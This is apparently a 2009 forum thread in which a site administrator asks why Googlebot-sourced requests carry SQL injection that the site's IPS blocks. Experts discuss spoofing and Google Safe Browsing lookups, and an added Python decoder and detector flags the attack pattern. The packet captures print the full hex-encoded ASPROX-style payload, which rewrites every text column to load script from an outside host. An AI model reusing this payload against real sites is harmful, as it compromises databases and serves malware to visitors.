Solved

Google used as a hacking tool - inadvertently attacking my site

Posted on 2009-05-19
Last Modified: 2013-11-29
Google is somehow being used or manipulated to attack our website.  We have an IPS that records all attack traffic.  At least 500 times a day, googlebot attempts to hit a few sites in our facility with SQL injection such as ASPROX.  Because our IPS blocks the traffic, googlebot is never able to index the pages.  The site itself is not compromised in any way and we cannot seem to determine why Google is trying to do this.  Because googlebot's traffic is being blocked, it is continuing to hit the site relentlessly.

Some packet captures are below


Frame 1 (1484 bytes on wire, 1484 bytes captured)
    Arrival Time: May 19, 2009 04:16:02.248079000
    Time delta from previous packet: 0.000000000 seconds
    Time since reference or first frame: 0.000000000 seconds
    Frame Number: 1
    Packet Length: 1484 bytes
    Capture Length: 1484 bytes
    Protocols in frame: eth:ip:tcp:http
Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
    Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
    Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)
    Type: IP (0x0800)
Internet Protocol, Src: crawl-66-249-65-18.googlebot.com (66.249.65.18), Dst: www.coolabah.com (69.63.131.110)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 1470
    Identification: 0xeb57 (60247)
    Flags: 0x04 (Don't Fragment)
        0... = Reserved bit: Not set
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 56
    Protocol: TCP (0x06)
    Header checksum: 0x052a [correct]
        Good: True
        Bad : False
    Source: crawl-66-249-65-18.googlebot.com (66.249.65.18)
    Destination: www.coolabah.com (69.63.131.110)
Transmission Control Protocol, Src Port: 41347 (41347), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418
    Source port: 41347 (41347)
    Destination port: http (80)
    Sequence number: 0    (relative sequence number)
    Next sequence number: 1418    (relative sequence number)
    Acknowledgement number: 0    (relative ack number)
    Header length: 32 bytes
    Flags: 0x0010 (ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 90
    Checksum: 0x9fda [correct]
    Options: (12 bytes)
        NOP
        NOP
        Time stamp: tsval 121714743, tsecr 0
    TCP segment data (1418 bytes)
 
0000  00 1f 9d 81 0c 00 00 03 6c 3d 9c 1b 08 00 45 00   ........l=....E.
0010  05 be eb 57 40 00 38 06 05 2a 42 f9 41 12 45 3f   ...W@.8..*B.A.E?
0020  83 6e a1 83 00 50 ce cb d3 62 d5 94 b0 51 80 10   .n...P...b...Q..
0030  00 5a 9f da 00 00 01 01 08 0a 07 41 38 37 00 00   .Z.........A87..
0040  00 00 47 45 54 20 2f 73 70 6f 72 74 2f 6d 61 67   ..GET /sport/mag
0050  70 69 65 73 2e 63 66 6d 3f 3b 44 45 43 4c 41 52   pies.cfm?;DECLAR
0060  45 25 32 30 40 53 25 32 30 43 48 41 52 28 34 30   E%20@S%20CHAR(40
0070  30 30 29 3b 53 45 54 25 32 30 40 53 3d 43 41 53   00);SET%20@S=CAS
0080  54 28 30 78 34 34 34 35 34 33 34 43 34 31 35 32   T(0x4445434C4152
0090  34 35 32 30 34 30 35 34 32 30 37 36 36 31 37 32   4520405420766172
00a0  36 33 36 38 36 31 37 32 32 38 33 32 33 35 33 35   6368617228323535
00b0  32 39 32 43 34 30 34 33 32 30 37 36 36 31 37 32   292C404320766172
00c0  36 33 36 38 36 31 37 32 32 38 33 34 33 30 33 30   6368617228343030
00d0  33 30 32 39 32 30 34 34 34 35 34 33 34 43 34 31   3029204445434C41
00e0  35 32 34 35 32 30 35 34 36 31 36 32 36 43 36 35   5245205461626C65
00f0  35 46 34 33 37 35 37 32 37 33 36 46 37 32 32 30   5F437572736F7220
0100  34 33 35 35 35 32 35 33 34 46 35 32 32 30 34 36   435552534F522046
0110  34 46 35 32 32 30 37 33 36 35 36 43 36 35 36 33   4F522073656C6563
0120  37 34 32 30 36 31 32 45 36 45 36 31 36 44 36 35   7420612E6E616D65
0130  32 43 36 32 32 45 36 45 36 31 36 44 36 35 32 30   2C622E6E616D6520
0140  36 36 37 32 36 46 36 44 32 30 37 33 37 39 37 33   66726F6D20737973
0150  36 46 36 32 36 41 36 35 36 33 37 34 37 33 32 30   6F626A6563747320
0160  36 31 32 43 37 33 37 39 37 33 36 33 36 46 36 43   612C737973636F6C
0170  37 35 36 44 36 45 37 33 32 30 36 32 32 30 37 37   756D6E7320622077
0180  36 38 36 35 37 32 36 35 32 30 36 31 32 45 36 39   6865726520612E69
0190  36 34 33 44 36 32 32 45 36 39 36 34 32 30 36 31   643D622E69642061
01a0  36 45 36 34 32 30 36 31 32 45 37 38 37 34 37 39   6E6420612E787479
01b0  37 30 36 35 33 44 32 37 37 35 32 37 32 30 36 31   70653D2775272061
01c0  36 45 36 34 32 30 32 38 36 32 32 45 37 38 37 34   6E642028622E7874
01d0  37 39 37 30 36 35 33 44 33 39 33 39 32 30 36 46   7970653D3939206F
01e0  37 32 32 30 36 32 32 45 37 38 37 34 37 39 37 30   7220622E78747970
01f0  36 35 33 44 33 33 33 35 32 30 36 46 37 32 32 30   653D3335206F7220
0200  36 32 32 45 37 38 37 34 37 39 37 30 36 35 33 44   622E78747970653D
0210  33 32 33 33 33 31 32 30 36 46 37 32 32 30 36 32   323331206F722062
0220  32 45 37 38 37 34 37 39 37 30 36 35 33 44 33 31   2E78747970653D31
0230  33 36 33 37 32 39 32 30 34 46 35 30 34 35 34 45   363729204F50454E
0240  32 30 35 34 36 31 36 32 36 43 36 35 35 46 34 33   205461626C655F43
0250  37 35 37 32 37 33 36 46 37 32 32 30 34 36 34 35   7572736F72204645
0260  35 34 34 33 34 38 32 30 34 45 34 35 35 38 35 34   544348204E455854
0270  32 30 34 36 35 32 34 46 34 44 32 30 32 30 35 34   2046524F4D202054
0280  36 31 36 32 36 43 36 35 35 46 34 33 37 35 37 32   61626C655F437572
0290  37 33 36 46 37 32 32 30 34 39 34 45 35 34 34 46   736F7220494E544F
02a0  32 30 34 30 35 34 32 43 34 30 34 33 32 30 35 37   2040542C40432057
02b0  34 38 34 39 34 43 34 35 32 38 34 30 34 30 34 36   48494C4528404046
02c0  34 35 35 34 34 33 34 38 35 46 35 33 35 34 34 31   455443485F535441
02d0  35 34 35 35 35 33 33 44 33 30 32 39 32 30 34 32   5455533D30292042
02e0  34 35 34 37 34 39 34 45 32 30 36 35 37 38 36 35   4547494E20657865
02f0  36 33 32 38 32 37 37 35 37 30 36 34 36 31 37 34   6328277570646174
0300  36 35 32 30 35 42 32 37 32 42 34 30 35 34 32 42   65205B272B40542B
0310  32 37 35 44 32 30 37 33 36 35 37 34 32 30 35 42   275D20736574205B
0320  32 37 32 42 34 30 34 33 32 42 32 37 35 44 33 44   272B40432B275D3D
0330  32 37 32 37 32 32 33 45 33 43 32 46 37 34 36 39   2727223E3C2F7469
0340  37 34 36 43 36 35 33 45 33 43 37 33 36 33 37 32   746C653E3C736372
0350  36 39 37 30 37 34 32 30 37 33 37 32 36 33 33 44   697074207372633D
0360  32 32 36 38 37 34 37 34 37 30 33 41 32 46 32 46   22687474703A2F2F
0370  37 37 37 37 37 37 33 33 32 45 37 33 37 33 33 31   777777332E737331
0380  33 31 37 31 36 45 32 45 36 33 36 45 32 46 36 33   31716E2E636E2F63
0390  37 33 37 32 37 33 37 33 32 46 37 37 32 45 36 41   737273732F772E6A
03a0  37 33 32 32 33 45 33 43 32 46 37 33 36 33 37 32   73223E3C2F736372
03b0  36 39 37 30 37 34 33 45 33 43 32 31 32 44 32 44   6970743E3C212D2D
03c0  32 37 32 37 32 42 35 42 32 37 32 42 34 30 34 33   27272B5B272B4043
03d0  32 42 32 37 35 44 32 30 37 37 36 38 36 35 37 32   2B275D2077686572
03e0  36 35 32 30 32 37 32 42 34 30 34 33 32 42 32 37   6520272B40432B27
03f0  32 30 36 45 36 46 37 34 32 30 36 43 36 39 36 42   206E6F74206C696B
0400  36 35 32 30 32 37 32 37 32 35 32 32 33 45 33 43   6520272725223E3C
0410  32 46 37 34 36 39 37 34 36 43 36 35 33 45 33 43   2F7469746C653E3C
0420  37 33 36 33 37 32 36 39 37 30 37 34 32 30 37 33   7363726970742073
0430  37 32 36 33 33 44 32 32 36 38 37 34 37 34 37 30   72633D2268747470
0440  33 41 32 46 32 46 37 37 37 37 37 37 33 33 32 45   3A2F2F777777332E
0450  37 33 37 33 33 31 33 31 37 31 36 45 32 45 36 33   73733131716E2E63
0460  36 45 32 46 36 33 37 33 37 32 37 33 37 33 32 46   6E2F63737273732F
0470  37 37 32 45 36 41 37 33 32 32 33 45 33 43 32 46   772E6A73223E3C2F
0480  37 33 36 33 37 32 36 39 37 30 37 34 33 45 33 43   7363726970743E3C
0490  32 31 32 44 32 44 32 37 32 37 32 37 32 39 34 36   212D2D2727272946
04a0  34 35 35 34 34 33 34 38 32 30 34 45 34 35 35 38   45544348204E4558
04b0  35 34 32 30 34 36 35 32 34 46 34 44 32 30 32 30   542046524F4D2020
04c0  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375
04d0  37 32 37 33 36 46 37 32 32 30 34 39 34 45 35 34   72736F7220494E54
04e0  34 46 32 30 34 30 35 34 32 43 34 30 34 33 32 30   4F2040542C404320
04f0  34 35 34 45 34 34 32 30 34 33 34 43 34 46 35 33   454E4420434C4F53
0500  34 35 32 30 35 34 36 31 36 32 36 43 36 35 35 46   45205461626C655F
0510  34 33 37 35 37 32 37 33 36 46 37 32 32 30 34 34   437572736F722044
0520  34 35 34 31 34 43 34 43 34 46 34 33 34 31 35 34   45414C4C4F434154
0530  34 35 32 30 35 34 36 31 36 32 36 43 36 35 35 46   45205461626C655F
0540  34 33 37 35 37 32 37 33 36 46 37 32 25 32 30 41   437572736F72%20A
0550  53 25 32 30 43 48 41 52 28 34 30 30 30 29 29 3b   S%20CHAR(4000));
0560  45 58 45 43 28 40 53 29 3b 20 48 54 54 50 2f 31   EXEC(@S); HTTP/1
0570  2e 31 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 63 6f   .1..Host: www.co
0580  6f 6c 61 62 61 68 2e 63 6f 6d 0d 0a 43 6f 6e 6e   olabah.com..Conn
0590  65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 61 6c 69   ection: Keep-ali
05a0  76 65 0d 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d   ve..Accept: */*.
05b0  0a 46 72 6f 6d 3a 20 67 6f 6f 67 6c 65 62 6f 74   .From: googlebot
05c0  28 61 74 29 67 6f 6f 67 6c 65 62 6f               (at)googlebo
 
-----------------------------------------------------------------------------------------------------
Frame 1 (1484 bytes on wire, 1484 bytes captured)
    Arrival Time: May 19, 2009 04:08:20.781412000
    Time delta from previous packet: 0.000000000 seconds
    Time since reference or first frame: 0.000000000 seconds
    Frame Number: 1
    Packet Length: 1484 bytes
    Capture Length: 1484 bytes
    Protocols in frame: eth:ip:tcp:http
Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
    Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
    Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)
    Type: IP (0x0800)
Internet Protocol, Src: crawl-66-249-71-152.googlebot.com (66.249.71.152), Dst: 69.63.131.111 (69.63.131.111)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 1470
    Identification: 0xb69e (46750)
    Flags: 0x04 (Don't Fragment)
        0... = Reserved bit: Not set
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 57
    Protocol: TCP (0x06)
    Header checksum: 0x325c [correct]
        Good: True
        Bad : False
    Source: crawl-66-249-71-152.googlebot.com (66.249.71.152)
    Destination: 69.63.131.111 (69.63.131.111)
Transmission Control Protocol, Src Port: 33193 (33193), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418
    Source port: 33193 (33193)
    Destination port: http (80)
    Sequence number: 0    (relative sequence number)
    Next sequence number: 1418    (relative sequence number)
    Acknowledgement number: 0    (relative ack number)
    Header length: 32 bytes
    Flags: 0x0010 (ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 92
    Checksum: 0x6bf1 [correct]
    Options: (12 bytes)
        NOP
        NOP
        Time stamp: tsval 3656893948, tsecr 0
    TCP segment data (1418 bytes)
 
0000  00 1f 9d 81 0c 00 00 03 6c 3d 9c 1b 08 00 45 00   ........l=....E.
0010  05 be b6 9e 40 00 39 06 32 5c 42 f9 47 98 45 3f   ....@.9.2\B.G.E?
0020  83 6f 81 a9 00 50 de ea 73 7b 98 49 41 46 80 10   .o...P..s{.IAF..
0030  00 5c 6b f1 00 00 01 01 08 0a d9 f7 c5 fc 00 00   .\k.............
0040  00 00 47 45 54 20 2f 73 74 6f 72 79 31 31 38 2e   ..GET /story118.
0050  63 66 6d 3f 27 3b 44 45 43 4c 41 52 45 25 32 30   cfm?';DECLARE%20
0060  40 53 25 32 30 43 48 41 52 28 34 30 30 30 29 3b   @S%20CHAR(4000);
0070  53 45 54 25 32 30 40 53 3d 43 41 53 54 28 30 78   SET%20@S=CAST(0x
0080  34 34 34 35 34 33 34 43 34 31 35 32 34 35 32 30   4445434C41524520
0090  34 30 35 34 32 30 37 36 36 31 37 32 36 33 36 38   4054207661726368
00a0  36 31 37 32 32 38 33 32 33 35 33 35 32 39 32 43   617228323535292C
00b0  34 30 34 33 32 30 37 36 36 31 37 32 36 33 36 38   4043207661726368
00c0  36 31 37 32 32 38 33 34 33 30 33 30 33 30 32 39   6172283430303029
00d0  32 30 34 34 34 35 34 33 34 43 34 31 35 32 34 35   204445434C415245
00e0  32 30 35 34 36 31 36 32 36 43 36 35 35 46 34 33   205461626C655F43
00f0  37 35 37 32 37 33 36 46 37 32 32 30 34 33 35 35   7572736F72204355
0100  35 32 35 33 34 46 35 32 32 30 34 36 34 46 35 32   52534F5220464F52
0110  32 30 37 33 36 35 36 43 36 35 36 33 37 34 32 30   2073656C65637420
0120  36 31 32 45 36 45 36 31 36 44 36 35 32 43 36 32   612E6E616D652C62
0130  32 45 36 45 36 31 36 44 36 35 32 30 36 36 37 32   2E6E616D65206672
0140  36 46 36 44 32 30 37 33 37 39 37 33 36 46 36 32   6F6D207379736F62
0150  36 41 36 35 36 33 37 34 37 33 32 30 36 31 32 43   6A6563747320612C
0160  37 33 37 39 37 33 36 33 36 46 36 43 37 35 36 44   737973636F6C756D
0170  36 45 37 33 32 30 36 32 32 30 37 37 36 38 36 35   6E73206220776865
0180  37 32 36 35 32 30 36 31 32 45 36 39 36 34 33 44   726520612E69643D
0190  36 32 32 45 36 39 36 34 32 30 36 31 36 45 36 34   622E696420616E64
01a0  32 30 36 31 32 45 37 38 37 34 37 39 37 30 36 35   20612E7874797065
01b0  33 44 32 37 37 35 32 37 32 30 36 31 36 45 36 34   3D27752720616E64
01c0  32 30 32 38 36 32 32 45 37 38 37 34 37 39 37 30   2028622E78747970
01d0  36 35 33 44 33 39 33 39 32 30 36 46 37 32 32 30   653D3939206F7220
01e0  36 32 32 45 37 38 37 34 37 39 37 30 36 35 33 44   622E78747970653D
01f0  33 33 33 35 32 30 36 46 37 32 32 30 36 32 32 45   3335206F7220622E
0200  37 38 37 34 37 39 37 30 36 35 33 44 33 32 33 33   78747970653D3233
0210  33 31 32 30 36 46 37 32 32 30 36 32 32 45 37 38   31206F7220622E78
0220  37 34 37 39 37 30 36 35 33 44 33 31 33 36 33 37   747970653D313637
0230  32 39 32 30 34 46 35 30 34 35 34 45 32 30 35 34   29204F50454E2054
0240  36 31 36 32 36 43 36 35 35 46 34 33 37 35 37 32   61626C655F437572
0250  37 33 36 46 37 32 32 30 34 36 34 35 35 34 34 33   736F722046455443
0260  34 38 32 30 34 45 34 35 35 38 35 34 32 30 34 36   48204E4558542046
0270  35 32 34 46 34 44 32 30 32 30 35 34 36 31 36 32   524F4D2020546162
0280  36 43 36 35 35 46 34 33 37 35 37 32 37 33 36 46   6C655F437572736F
0290  37 32 32 30 34 39 34 45 35 34 34 46 32 30 34 30   7220494E544F2040
02a0  35 34 32 43 34 30 34 33 32 30 35 37 34 38 34 39   542C404320574849
02b0  34 43 34 35 32 38 34 30 34 30 34 36 34 35 35 34   4C45284040464554
02c0  34 33 34 38 35 46 35 33 35 34 34 31 35 34 35 35   43485F5354415455
02d0  35 33 33 44 33 30 32 39 32 30 34 32 34 35 34 37   533D302920424547
02e0  34 39 34 45 32 30 36 35 37 38 36 35 36 33 32 38   494E206578656328
02f0  32 37 37 35 37 30 36 34 36 31 37 34 36 35 32 30   2775706461746520
0300  35 42 32 37 32 42 34 30 35 34 32 42 32 37 35 44   5B272B40542B275D
0310  32 30 37 33 36 35 37 34 32 30 35 42 32 37 32 42   20736574205B272B
0320  34 30 34 33 32 42 32 37 35 44 33 44 32 37 32 37   40432B275D3D2727
0330  32 32 33 45 33 43 32 46 37 34 36 39 37 34 36 43   223E3C2F7469746C
0340  36 35 33 45 33 43 37 33 36 33 37 32 36 39 37 30   653E3C7363726970
0350  37 34 32 30 37 33 37 32 36 33 33 44 32 32 36 38   74207372633D2268
0360  37 34 37 34 37 30 33 41 32 46 32 46 37 37 37 37   7474703A2F2F7777
0370  37 37 33 33 32 45 37 33 37 33 33 31 33 31 37 31   77332E7373313171
0380  36 45 32 45 36 33 36 45 32 46 36 33 37 33 37 32   6E2E636E2F637372
0390  37 33 37 33 32 46 37 37 32 45 36 41 37 33 32 32   73732F772E6A7322
03a0  33 45 33 43 32 46 37 33 36 33 37 32 36 39 37 30   3E3C2F7363726970
03b0  37 34 33 45 33 43 32 31 32 44 32 44 32 37 32 37   743E3C212D2D2727
03c0  32 42 35 42 32 37 32 42 34 30 34 33 32 42 32 37   2B5B272B40432B27
03d0  35 44 32 30 37 37 36 38 36 35 37 32 36 35 32 30   5D20776865726520
03e0  32 37 32 42 34 30 34 33 32 42 32 37 32 30 36 45   272B40432B27206E
03f0  36 46 37 34 32 30 36 43 36 39 36 42 36 35 32 30   6F74206C696B6520
0400  32 37 32 37 32 35 32 32 33 45 33 43 32 46 37 34   272725223E3C2F74
0410  36 39 37 34 36 43 36 35 33 45 33 43 37 33 36 33   69746C653E3C7363
0420  37 32 36 39 37 30 37 34 32 30 37 33 37 32 36 33   7269707420737263
0430  33 44 32 32 36 38 37 34 37 34 37 30 33 41 32 46   3D22687474703A2F
0440  32 46 37 37 37 37 37 37 33 33 32 45 37 33 37 33   2F777777332E7373
0450  33 31 33 31 37 31 36 45 32 45 36 33 36 45 32 46   3131716E2E636E2F
0460  36 33 37 33 37 32 37 33 37 33 32 46 37 37 32 45   63737273732F772E
0470  36 41 37 33 32 32 33 45 33 43 32 46 37 33 36 33   6A73223E3C2F7363
0480  37 32 36 39 37 30 37 34 33 45 33 43 32 31 32 44   726970743E3C212D
0490  32 44 32 37 32 37 32 37 32 39 34 36 34 35 35 34   2D27272729464554
04a0  34 33 34 38 32 30 34 45 34 35 35 38 35 34 32 30   4348204E45585420
04b0  34 36 35 32 34 46 34 44 32 30 32 30 35 34 36 31   46524F4D20205461
04c0  36 32 36 43 36 35 35 46 34 33 37 35 37 32 37 33   626C655F43757273
04d0  36 46 37 32 32 30 34 39 34 45 35 34 34 46 32 30   6F7220494E544F20
04e0  34 30 35 34 32 43 34 30 34 33 32 30 34 35 34 45   40542C404320454E
04f0  34 34 32 30 34 33 34 43 34 46 35 33 34 35 32 30   4420434C4F534520
0500  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375
0510  37 32 37 33 36 46 37 32 32 30 34 34 34 35 34 31   72736F7220444541
0520  34 43 34 43 34 46 34 33 34 31 35 34 34 35 32 30   4C4C4F4341544520
0530  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375
0540  37 32 37 33 36 46 37 32 25 32 30 41 53 25 32 30   72736F72%20AS%20
0550  43 48 41 52 28 34 30 30 30 29 29 3b 45 58 45 43   CHAR(4000));EXEC
0560  28 40 53 29 3b 20 48 54 54 50 2f 31 2e 31 0d 0a   (@S); HTTP/1.1..
0570  48 6f 73 74 3a 20 77 77 77 2e 6c 65 74 74 65 72   Host: www.letter
0580  66 72 6f 6d 6e 65 77 79 6f 72 6b 2e 63 6f 6d 0d   fromnewyork.com.
0590  0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65   .Connection: Kee
05a0  70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 74 3a   p-alive..Accept:
05b0  20 2a 2f 2a 0d 0a 46 72 6f 6d 3a 20 67 6f 6f 67    */*..From: goog
05c0  6c 65 62 6f 74 28 61 74 29 67 6f 6f               lebot(at)goo

Question by:vladfriedman
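A decoder and detector for the hex-wrapped SQL injection stage seen in the captures above, added here as an example (it is not code from the question or from any of the answers). The request line it runs on is constructed to the same shape as the captured GETs, with a short stand-in for the long hex literal; the path, parameter names and log format are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (not copied from the captures): same shape as the
# captured GETs, with a short T-SQL stand-in inside the CAST(0x...) literal.
INNER_SQL = ("DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
             "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id")
SAMPLE_ATTACK = ("GET /story118.cfm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
                 + INNER_SQL.encode("ascii").hex().upper()
                 + "%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1")
SAMPLE_BENIGN = "GET /story118.cfm?id=118&page=2 HTTP/1.1"

# The hex-wrapped stage: SET @S=CAST(0x... AS CHAR(n)); ... EXEC(@S)
CAST_HEX = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?CHAR\(\d+\)\)", re.I)
STAGE_MARKERS = (
    re.compile(r"\bDECLARE\s+@\w+\s+N?CHAR\(\d+\)", re.I),
    re.compile(r"\bEXEC\(\s*@\w+\s*\)", re.I),
)


def split_request_line(line):
    """Return (method, target, version). The target can itself contain a
    literal space once the attacker stops URL-encoding, so split only on the
    first and the last space of the line."""
    method, rest = line.split(" ", 1)
    target, version = rest.rsplit(" ", 1)
    return method, target, version


def decode_hex_literal(hex_digits):
    """Turn the 0x... literal back into the T-SQL it hides.
    latin-1 maps every byte, so odd bytes never raise here."""
    return bytes.fromhex(hex_digits).decode("latin-1")


def analyze(request_line):
    """Decode one request line and report whether it carries the
    DECLARE/CAST(0x...)/EXEC stage and, if so, the SQL hidden in the hex."""
    _, target, _ = split_request_line(request_line)
    path, _, raw_query = target.partition("?")
    query = unquote(raw_query)  # %20 -> ' ', etc.; the IPS sees the raw form
    hidden = [decode_hex_literal(h) for h in CAST_HEX.findall(query)]
    markers_hit = all(p.search(query) for p in STAGE_MARKERS)
    return {
        "path": path,
        "query": query,
        "hidden_sql": hidden,
        "suspicious": markers_hit and bool(hidden),
    }


def flag_requests(lines):
    """Run analyze() over request lines (e.g. exported from an IPS or a web
    server log) and keep only the hits."""
    return [r for r in (analyze(l) for l in lines) if r["suspicious"]]


if __name__ == "__main__":
    for hit in flag_requests([SAMPLE_BENIGN, SAMPLE_ATTACK]):
        print("flagged:", hit["path"])
        for sql in hit["hidden_sql"]:
            print("  hidden T-SQL:", sql)
```

Decoding the hidden SQL is what tells you what the stage would do on an unpatched server and which hostname it drags into every text column, which is the lead you need when hunting for the page Google first crawled.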
8 Comments
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 24426785
Bring this to the attention of Chris Shiflett, here: http://shiflett.org/

I am sure he will be interested and may have seen something similar that can help you out.

Best regards, ~Ray
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 24479910
It seems unlikely it's really a google-bot... the traffic/IP can be spoofed, the attack could be real, it's just that the attacker is hiding their packets by using a google-bot IP. Google-bot doesn't spend much time re-trying anything; that is what tells me that it's not really Google. They move on quite quickly and typically only follow links and look for robots.txt.
Google-bot first tries to find a robots.txt file; it tries in each directory it makes it into. I've looked in my apache logs after being crawled and there are plenty of 404s for the google-bot.
http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=40364
-rich
 

Expert Comment

by:gdi67
ID: 24489578
I agree with richrumble. There are some tools which use Google to crawl your website.
 

Author Comment

by:vladfriedman
ID: 24489630
It is the real google bot, it is originating from Google owned IPs.  If I set up a page with SQL injection commands pointing to a destination site, and then had Google index my page, it would then try all of the links on my site which included the SQL injection commands.

I know this is google.  The problem is not that google is originating the attack.  The trick is identifying the source page that was originally indexed.
 
LVL 38

Accepted Solution

by:
Rich Rumble earned 2000 total points
ID: 24489708
Try adding your site to the end of this URL
http://www.google.com/safebrowsing/diagnostic?site=
Like this:
http://www.google.com/safebrowsing/diagnostic?site=experts-exchange.com
Google keeps a strict log of when and where google-bot has been, and from my findings the URL above only needs about an hour to be updated, so if my site was crawled, 1hr later it's there. Subdomains however don't show up...
If you think it's not spoofed traffic, write to google they are helpful and might be able to better track down the issue and how they are leveraged to do this attack. I still think it's spoofed, unless your site is coolabah.com
http://www.google.com/safebrowsing/diagnostic?site=www.coolabah.com which is infested and has been for some time.
-rich
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 24493285
Regarding this: "It is the real google bot, it is originating from google owned IPs..." the IP address is external data and can be faked.  Have you contacted Chris yet?

Best, ~Ray
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 24494773
Was it spoofed? Or was it your IPS picking up on traffic being crawled on some web-pages, and not distributed via the google-bot crawler? Google-bot is a "getter" and not a "putter" (gbot is a receiver, not a sender).
-rich
 

Author Comment

by:vladfriedman
ID: 24497475
Hi Ray.  The IP really can't be faked in our environment, and it is not being faked.
